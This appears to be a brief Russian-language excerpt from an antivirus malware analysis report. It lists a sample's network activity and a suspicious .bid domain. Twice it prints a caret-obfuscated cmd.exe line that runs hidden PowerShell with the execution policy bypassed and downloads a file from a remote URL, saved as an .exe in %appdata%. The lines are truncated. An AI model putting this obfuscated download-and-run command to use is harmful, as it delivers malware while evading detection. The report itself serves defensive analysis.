Техническая информация
- http://www.asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wer^SheL^L.exE^ -EX^eCuTIOnpO^LIc^y bYPASS^ ^-nO^P^rO^fI^l^e -w^i^nDowStyL^E^ hI^D^d^eN^ (^n^EW^-oBJ^Ec^T SYST^Em^.^NE^t.We^Bc^LIe^NT).dO^wN^LO^aD^fil^e(^'http://www.asec...
- 'as###itlecn.bid':80
- http://www.as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "p^o^wer^SheL^L.exE^ -EX^eCuTIOnpO^LIc^y bYPASS^ ^-nO^P^rO^fI^l^e -w^i^nDowStyL^E^ hI^D^d^eN^ (^n^EW^-oBJ^Ec^T SYST^Em^.^NE^t.We^Bc^LIe^NT).dO^wN^LO^aD^fil^e(^'http://www.asec...' (со скрытым окном)